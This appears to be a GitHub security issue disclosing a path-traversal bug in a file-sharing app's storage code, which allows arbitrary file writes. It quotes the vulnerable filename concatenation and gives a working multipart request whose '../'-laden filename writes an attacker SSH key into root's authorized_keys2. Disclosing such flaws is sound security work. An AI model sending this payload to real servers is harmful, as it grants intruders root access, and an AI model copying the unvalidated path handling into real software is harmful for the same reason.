
[SECURITY] path traversal leads to arbitrary file write when using filesystem storage #349

@Cycloctane

Description


Describe the bug

get_file_path_name and SystemFileStorage.save_file directly use the filename from user input without any validation and concatenate strings to generate the final save_path and save the file. This is extremely vulnerable to path traversal and allows arbitrary file writes.

save_path = f"{path}/{file.filename}"
return path, suffix, prefix, file.filename, save_path

save_path = self.root_path / save_path
if not save_path.parent.exists():
save_path.parent.mkdir(parents=True)
await asyncio.to_thread(self._save, file.file, save_path)

PoC

An attacker can perform arbitrary file writes by sending a multipart request with a malicious filename.

POST /share/file/ HTTP/1.1
Host: 127.0.0.1:12345
Content-Type: multipart/form-data; boundary=----8f188eaea17e2acaad37ec700ad01edd

------8f188eaea17e2acaad37ec700ad01edd
Content-Disposition: form-data; name="file"; filename="../../../../../../../../root/.ssh/authorized_keys2"
Content-Type: text/plain

ssh-rsa AAAA...

------8f188eaea17e2acaad37ec700ad01edd
Content-Disposition: form-data; name="expire_value"

1
------8f188eaea17e2acaad37ec700ad01edd
Content-Disposition: form-data; name="expire_style"

minute
------8f188eaea17e2acaad37ec700ad01edd--

Affected versions

<= 2.2

Additional context

CWE-23
